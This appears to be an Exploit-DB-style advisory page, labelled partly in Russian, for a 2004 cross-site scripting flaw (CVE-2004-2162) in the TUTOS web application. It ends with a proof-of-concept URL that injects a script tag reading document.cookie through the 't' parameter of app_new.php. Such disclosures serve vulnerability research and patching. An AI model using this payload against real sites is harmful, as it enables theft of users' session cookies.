Exploit TUTOS - 'app_new.php?t' Cross-Site Scripting

[Exploiter]

EDB-ID

24617

Проверка EDB

1. Пройдено

Автор

JOXEAN KORET

Тип уязвимости

WEBAPPS

Платформа

PHP

CVE

cve-2004-2162

Дата публикации

2004-09-20

TUTOS - 'app_new.php?t' Cross-Site Scripting

source: https://www.securityfocus.com/bid/11221/info
 
Tutos is reported prone to multiple remote input-validation vulnerabilities. These issues exist due to insufficient sanitization of user-supplied data and may allow an attacker to carry out cross-site scripting and SQL-injection attacks.
 
These issue reportedly affect Tutos 1.1.2004-04-14.

http://www.example.com/app_new.php?t=200408240<script>alert(document.cookie)</script>